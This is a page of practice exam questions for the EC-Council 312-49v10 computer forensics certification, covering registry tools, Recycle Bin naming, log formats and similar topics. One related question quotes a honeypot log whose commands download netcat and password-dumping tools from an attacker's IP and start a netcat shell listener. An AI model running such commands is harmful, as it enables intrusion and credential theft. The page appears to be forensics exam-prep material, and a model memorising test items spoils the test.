Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 36

Question list

List of questions

Question 351

(0)

The investigator wants to examine changes made to the system's registry by the suspect program. Which of the following tool can help the investigator?

Question 352

(0)

What does the part of the log, "% SEC-6-IPACCESSLOGP", extracted from a Cisco router represent?

Question 353

(0)

Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where "x" represents the ___________________.

Question 354

(0)

Which of the following is an iOS Jailbreaking tool?

Question 355

(0)

Which of the following Registry components include offsets to other cells as well as the LastWrite time for the key?

Question 356

(0)

What is the default IIS log location?

Question 357

(0)

Charles has accidentally deleted an important file while working on his Mac computer. He wants to recover the deleted file as it contains some of his crucial business secrets. Which of the following

Question 358

(0)

Which file is a sequence of bytes organized into blocks understandable by the system's linker?

Question 359

(0)

Smith, a forensic examiner, was analyzing a hard disk image to find and acquire deleted sensitive files. He stumbled upon a $Recycle.Bin folder in the root directory of the disk. Identify the operat

Question 360

(0)

Jason discovered a file named $RIYG6VR.doc in the C:\$Recycle.Bin\\ while analyzing a hard disk image for the deleted dat a. What inferences can he make from the file name?

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?

In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?

William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?

An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?

Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 351

The investigator wants to examine changes made to the system's registry by the suspect program.

Which of the following tool can help the investigator?

TRIPWIRE

RAM Capturer

Regshot

What's Running

Show Answer Comment (0)

Question 352

What does the part of the log, "% SEC-6-IPACCESSLOGP", extracted from a Cisco router represent?

The system was not able to process the packet because there was not enough room for all of the desired IP header options

Immediate action required messages

Some packet-matching logs were missed because the access list log messages were rate limited, or no access list log buffers were available

A packet matching the log criteria for the given access list has been detected (TCP or UDP)

Show Answer Comment (0)

Question 353

Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where "x" represents the ___________________.

Drive name

Original file name's extension

Sequential number

Original file name

Show Answer Comment (0)

Question 354

Which of the following is an iOS Jailbreaking tool?

Kingo Android ROOT

Towelroot

One Click Root

Redsn0w

Show Answer Comment (0)

Question 355

Which of the following Registry components include offsets to other cells as well as the LastWrite time for the key?

Value list cell

Value cell

Key cell

Security descriptor cell

Show Answer Comment (0)

Question 356

What is the default IIS log location?

SystemDrive\inetpub\LogFiles

%SystemDrive%\inetpub\logs\LogFiles

%SystemDrive\logs\LogFiles

SystemDrive\logs\LogFiles

Show Answer Comment (0)

Charles has accidentally deleted an important file while working on his Mac computer. He wants to recover the deleted file as it contains some of his crucial business secrets. Which of the following tool will help Charles?

Xplico

Colasoft's Capsa

FileSalvage

DriveSpy

Show Answer Comment (0)

Question 358

Which file is a sequence of bytes organized into blocks understandable by the system's linker?

executable file

source file

Object file

None of these

Show Answer Comment (0)

Question 359

Smith, a forensic examiner, was analyzing a hard disk image to find and acquire deleted sensitive files. He stumbled upon a $Recycle.Bin folder in the root directory of the disk. Identify the operating system in use.

Windows 98

Linux

Windows 8.1

Windows XP

Show Answer Comment (0)

Question 360

Jason discovered a file named $RIYG6VR.doc in the C:\$Recycle.Bin\\ while analyzing a hard disk image for the deleted dat a. What inferences can he make from the file name?

It is a doc file deleted in seventh sequential order

RIYG6VR.doc is the name of the doc file deleted from the system

It is file deleted from R drive

It is a deleted doc file

Show Answer Comment (0)

Total 704 questions

34 35 36 37 38

Go to page: of 71